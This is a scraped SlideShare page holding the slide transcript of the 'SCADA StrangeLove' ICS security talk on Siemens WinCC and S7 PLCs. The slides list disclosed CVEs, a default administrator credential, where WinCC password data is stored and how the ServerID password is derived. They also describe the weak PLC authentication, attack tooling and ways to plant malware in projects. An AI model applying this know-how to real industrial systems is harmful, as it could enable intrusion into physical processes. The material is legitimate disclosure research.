Your SlideShare is downloading. ×
0
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Scada strange love.

1,104

Published on

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,104
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
0
Comments
0
Likes
1
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. All pictures are taken fromDr StrangeLove movie
  • 2.  Group of security researchers focused on ICS/SCADAto save Humanity from industrial disaster and tokeep Purity Of EssenceSergey Gordeychik Gleb Gritsai Denis BaranovRoman Ilin Ilya Karpov Sergey BobrovArtem Chaykin Yuriy Dyachenko Sergey DrozdovDmitry Efanov Yuri Goltsev Vladimir KochetkovAndrey Medov Sergey Scherbel Timur YunusovAlexander Zaitsev Dmitry Serebryannikov Dmitry NagibinDmitry Sklyarov Alexander Timorin Vyacheslav EgoshinRoman Ilin Alexander Tlyapov
  • 3.  Goalsto automate security assessment of ICSplatforms and environment Objectivesto understand systemto assess built-in security featuresto create security audit/hardening guidesto automate processVulnerabilities – waste production
  • 4.  Goalto create PoC of Stuxnet-style attack Initial conditionscommon ICS components and configurationcommon ICS security toolsonly ICS components weaknessvulnerabilities by SCADA StrangeLove team
  • 5.  Engineering tools STEP 7 PCS7 TIA PORTAL SCADA/HMI WinCC (Windows) WinCC Flexible/Advanced (Windows/Win CE) S7 family PLC Old line (200, 300, 400) New line (1200, 1500)
  • 6.  WinCC Server Windows/MSSQL based SCADA WinCC Client (HMI) WinCC runtime + Project + OPC WinCC Web Server (WebNavigator) IIS/MSSQL/ASP/ASP.NET/SOAP WinCC WebClient (HMI) ActiveX/HTML/JS
  • 7. 1 2 9 7 610 1114 1773100 968999413528581010020030040050060070080090010001997 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012 2013
  • 8.  Cyber Weapon Tactics, Techniques, and Procedures (TTPs) APT1 APT 2.0 Cyber Kill Chain
  • 9.  ChinJa (R) (tm) Breaking through Harvesting Creeping death Chaos
  • 10. That is a question!
  • 11. http://bit.ly/RI6FtQhttp://bit.ly/UXn7d1
  • 12. http://www.surfpatrol.ru/en/report
  • 13.  A lot of “WinCCed” IE fromcountries/companies/industries Special prize to guys from US forWinCC 6.X at 2012
  • 14.  XPath Injection (CVE-2012-2596) Path Traversal (CVE-2012-2597) XSS ~ 20 Instances (CVE-2012-2595)Fixed in Update 2 for WinCC V7.0 SP3http://support.automation.siemens.com/WW/view/en/60984587
  • 15.  Lot of XSS and CSRF CVE-2012-3031 CVE-2012-3028 Lot of arbitrary file reading CVE-2012-3030 SQL injection over SOAP CVE-2012-3032 Username and password disclosure via ActiveXabuse CVE-2012-3034Fixed in Update 3 for WinCC V7.0 SP3http://support.automation.siemens.com/WW/view/en/63472422
  • 16.  Path Traversal CVE-2013-0679 Buffer overflow in ActiveX CVE-2013-0674 XXE OOB CVE-2013-0677 Missing encryption of sensitive data CVE-2013-0678 Improper authorization CVE-2013-0676fFixed in WinCC 7.2/SIMATIC PCS7 V8.0 SP 1http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-714398.pdf
  • 17.  Network-level Active scan S7, Modbus, MSSQL (WinCC Instance), HTTP(S) SNMP (public/private hardcoded for PLC and HMIPanels) Passive scan Profinet Host-level WinCC forensic
  • 18. Dmitry Efanovhttp://scadastrangelove.blogspot.ru/2012/11/plcscan.html
  • 19. Alexander TimorinPHDays III release
  • 20.  PdlRt.exe – graphic runtime CCRtsLoader.EXE – loader s7otbxsx.exe – network Inter process communication: RPC Sections (memory mapped files) BaseNamedObjectsTCPSharedMm and otherinteresting stuff
  • 21.  Detecting active project:HKCUSoftwareSIEMENSWINCCControlCenterDefault Settings LastOpenPath LastProject Detecting MS SQL database name (timestamp)ArchiveManagerAlarmLoggingArchiveManagerTagLogging*Obtaining information from database and systemobjects
  • 22. • {Hostname}_{Project}_TLG*• TAG data• СС_{Project}_{Timestamp}*• Project data and configuration• Users, PLCs, Privileges
  • 23. • Managed by UM app• Stored in dbo.PW_USER
  • 24. CVE-2013-0676
  • 25. • Administrator:ADMINISTRATOR• Avgur2 > Avgur
  • 26. This is myencryptionkey
  • 27.  Select from MS SQL via COM objects “Special” Windows Account Shortcuts**we don’t know yet, you know
  • 28. Authenticationvia SQL-storedaccountsServerID magic toget WebBridgepasswordMagic is used forSCSWebBridgeX
  • 29. Too hard for me…
  • 30. Oh! En/c(r)ypt[10]n!ServerID = Base64(RC2(pass, key)), were key= MD5(dll hardcode)
  • 31. Not my department password!
  • 32.  All other confections use WNUSR forauthentication For authorization ID parameter is used
  • 33. Not yet…
  • 34.  «Magic» password = MD5(WNUSR_DC92D7179E29.Password) WNUSR_DC92D7179E29.Password generated during installation Stored in registry via DPAPI Good length and chartset but…
  • 35.  WinCC clients use hardcoded account tocommunicate with OPC Web bridge Password for WNUSR_DC92D7179E29 generatedduring installation and probably strong MD5(WNUSR_.Password) stored with DPAPIprotection “Encrypted” password for WNUSR_DC* can beobtained by request to WinCCWebBridge.dll WNUSR_DC92D7179E29 is only account used forwork with Windows/Database
  • 36. …responsible disclosure
  • 37.  What is Project? Collection of ActiveX/COM/.NET objects Event Handlers and other code (C/VB) Configuration files, XML and other Can Project be trusted? Ways to spread malware with Project?
  • 38.  NO! Project itself is dynamic code It’s easy to patch it “on the fly” Vulnerabilities in data handlers(CVE-2013-0677) How to abuse? Simplest way – to patch eventhandlers
  • 39.  Hardcoded SNMP community string (unfixed) Hardcoded S7 PLC CA certificate (Dmitry Sklarov)http://scadastrangelove.blogspot.com/2012/09/all-your-plc-belong-to-us.html Multiple vulnerabilities in S7 1200 PLC Webinterface (Dmitriy Serebryannikov, Artem Chaikin, YuryGoltsev, Timur Yunusov)http://www.siemens.com/corporatetechnology/pool/de/forschungsfelder/siemens_security_advisory_ssa-279823.pdf
  • 40.  Can be protected by password Authentication – simple challenge-response Password hashed (SHA1) on client (TIAPortal) Server (PLC) provide 20 byte challenge Client calculate HMAC-SHA1(challenge, SHA1(password) asresponse
  • 41.  Can be protected by password Authentication – simple challenge-response Password hashed (SHA1) on client (TIAPortal) Server (PLC) provide 20 byte challenge Client calculate HMAC-SHA1(challenge, SHA1(password)) asresponse
  • 42.  SHA-1 stored in PLC project files It can be intercepted duringfirmware update/project upload It can be extracted from project fileSHA-1(pass)VSHMAC-SHA1(challenge, SHA1(pass))
  • 43.  Buffer overflow CVE-2013-0669 Cross-Site Scripting CVE-2013-0672/CVE-2013-0670/CVE-2013-0668 Directory traversal/Response splitting CVE-2013-0671 Server-side script injection CVE-2012-3032Fixed in WinCC (TIA Portal) V12http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-212483.pdf
  • 44.  Profinet scanner WinCC Harvester 2.0http://scadastrangelove.blogspot.com/search/label/Releases
  • 45.  TIA portal Security Hardening Guide S7 protocol password brute force tool and JtR Simatic WinCC Security Hardening Guide PLCScan tool ICS/SCADA/PLC Google/Shodan CheatSheet SCADA Safety in Numbershttp://scadastrangelove.blogspot.com/search/label/Releases
  • 46. All pictures are taken fromDr StrangeLove movie

×